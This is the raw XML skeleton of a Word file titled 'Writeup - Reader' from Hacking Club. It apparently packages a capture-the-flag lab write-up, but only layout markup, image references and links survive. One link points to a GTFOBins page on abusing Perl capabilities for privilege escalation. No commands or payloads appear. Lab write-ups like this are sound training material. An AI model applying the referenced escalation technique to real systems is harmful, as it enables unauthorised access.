                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId38" w:type="default"/>
      <w:headerReference r:id="rId39" w:type="first"/>
      <w:headerReference r:id="rId40" w:type="even"/>
      <w:footerReference r:id="rId41" w:type="default"/>
      <w:footerReference r:id="rId42" w:type="first"/>
      <w:footerReference r:id="rId43" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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IBM Plex Sans SemiBold">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4">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:fill="9a309b" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2026 Hacking Club | All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                          Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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5">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6">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E">
    <w:pPr>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05F">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="7"/>
    <w:bookmarkEnd w:id="7"/>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-866770</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="70" name="image16.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image16.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image1.png"/>
        </v:shape>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2">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-942970</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="48" name="image7.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image7.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3005191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46" name=""/>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:cNvPr id="2" name="Shape 2"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="2390550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651700"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
                          <w:pPr>
                            <w:spacing w:after="120" w:before="480" w:line="275.9999942779541"/>
                            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - </w:t>
                          </w:r>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Reader</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr anchorCtr="0" anchor="ctr"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-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3005191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46" name="image32.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image32.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6686550" cy="3005191"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect"/>
                      <a:ln/>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Fallback>
      </mc:AlternateConten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3">
    <w:pPr>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:leader="none" w:pos="4252"/>
        <w:tab w:val="right" w:leader="none" w:pos="8504"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId1" o:title="image1.pn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eader" Target="header3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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5.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/8" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/perl/#capabilities" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/></Relationships>
</file>

<file path=word/_rels/fontTable.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.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6.jpg"/><Relationship Id="rId2"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7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.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S3gJL72MTh5gRmjG+v/v7X1bUgw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnN0am1wcWVuc2F1azIOaC5kZnI3dzRrOGlyc24yDmgucDMzNHgzcHVqc3BxMg5oLjE3NWY1Y3M5NHowbzgAciExT0dfSUxtS01kOFdxcTBSblRULS12cWlQdzBzaC1oUEY=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